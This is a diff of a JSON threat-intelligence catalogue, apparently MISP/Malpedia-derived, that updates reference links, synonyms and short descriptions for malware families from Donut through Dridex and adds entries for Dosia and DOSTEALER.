"description": "Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42).\r\nGithub: https://github.com/TheWover/donut",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector",
- "https://thewover.github.io/Introducing-Donut/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us"
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://thewover.github.io/Introducing-Donut/"
],
"synonyms": [
"Donut"
@@ -20782,7 +22119,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/",
+ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
],
"synonyms": [],
"type": []
@@ -20795,21 +22134,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
- "https://redcanary.com/blog/grief-ransomware/",
+ "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
"https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
- "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
"https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware",
- "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
- "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
- "https://cyber-anubis.github.io/malware%20analysis/dridex/",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
+ "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
+ "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
"https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://twitter.com/BrettCallow/status/1453557686830727177?s=20"
+ "https://cyber-anubis.github.io/malware%20analysis/dridex/",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware"
],
"synonyms": [],
"type": []
@@ -20822,63 +22161,65 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer",
- "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
- "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
- "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://twitter.com/vikas891/status/1385306823662587905",
- "https://redcanary.com/blog/grief-ransomware/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
- "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
- "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
+ "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/",
+ "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
- "https://techcrunch.com/2020/03/01/visser-breach/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
"https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://techcrunch.com/2020/03/01/visser-breach/",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
+ "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
"https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer"
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
+ "https://twitter.com/vikas891/status/1385306823662587905"
],
"synonyms": [
"Pay OR Grief"
@@ -20893,10 +22234,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html",
- "https://research.checkpoint.com/dorkbot-an-investigation/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/",
+ "https://research.checkpoint.com/dorkbot-an-investigation/",
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
],
"synonyms": [],
"type": []
@@ -20909,8 +22250,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [],
"type": []
@@ -20918,6 +22259,37 @@
"uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711",
"value": "Dorshel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dosia",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
+ "https://medium.com/@b42labs/data-insights-from-russian-cyber-militants-noname057-9f4db98f60e",
+ "https://decoded.avast.io/martinchlumecky/ddosia-project-how-noname05716-is-trying-to-improve-the-efficiency-of-ddos-attacks/",
+ "https://www.team-cymru.com/post/a-blog-with-noname"
+ ],
+ "synonyms": [
+ "DDOSIA"
+ ],
+ "type": []
+ },
+ "uuid": "eabd30ed-d2ec-43b5-b790-7381f93a3a03",
+ "value": "Dosia"
+ },
+ {
+ "description": "According to Mandiant, DOSTEALER is a dataminer that mines browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dostealer",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3b4bf82d-5c57-4ea2-847d-f2fd292ba730",
+ "value": "DOSTEALER"
+ },
{
"description": "",
"meta": {
@@ -20938,7 +22310,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback",
- "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html"
+ "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/"
],
"synonyms": [],
"type": []
@@ -20952,8 +22325,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
- "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
- "https://twitter.com/Int2e_/status/1294565186939092994"
+ "https://twitter.com/Int2e_/status/1294565186939092994",
+ "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/"
],
"synonyms": [
"VALIDATOR"
@@ -20968,10 +22341,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar",
- "https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+ "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/",
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit",
- "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
+ "https://github.com/countercept/doublepulsar-c2-traffic-decryptor"
],
"synonyms": [],
"type": []
@@ -20984,19 +22357,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html",
- "https://cert.gov.ua/article/38088",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cert.gov.ua/article/38088",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero",
+ "https://unit42.paloaltonetworks.com/doublezero-net-wiper/",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
"https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html"
],
"synonyms": [
@@ -21012,25 +22389,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph",
- "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/",
"https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf",
+ "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [
"DELPHACY"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "837a295c-15ff-41c0-9b7e-5f2fb502b00a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2",
"value": "Downdelph"
},
@@ -21053,9 +22421,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper",
- "https://www.infinitumit.com.tr/apt-35/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
"http://www.clearskysec.com/charmingkitten/",
- "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ "https://www.infinitumit.com.tr/apt-35/"
],
"synonyms": [],
"type": []
@@ -21094,14 +22462,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot",
- "https://community.riskiq.com/article/30f22a00",
- "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://community.riskiq.com/article/30f22a00",
+ "https://lokalhost.pl/gozi_tree.txt",
"https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality",
"https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
- "https://lokalhost.pl/gozi_tree.txt"
+ "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
],
"synonyms": [],
"type": []
@@ -21114,131 +22482,125 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex",
- "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "https://blog.lexfo.fr/dridex-malware.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://community.riskiq.com/article/2cd1c003",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.youtube.com/watch?v=1VB15_HgUkg",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
+ "https://unit42.paloaltonetworks.com/travel-themed-phishing/",
+ "https://cyber-anubis.github.io/malware%20analysis/dridex/",
+ "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://artik.blue/malware3",
+ "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
+ "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
+ "https://community.riskiq.com/article/e4fb7245",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://home.treasury.gov/news/press-releases/sm845",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://twitter.com/felixw3000/status/1382614469713530883?s=20",
+ "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
+ "https://muha2xmad.github.io/unpacking/dridex/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
+ "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
+ "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation",
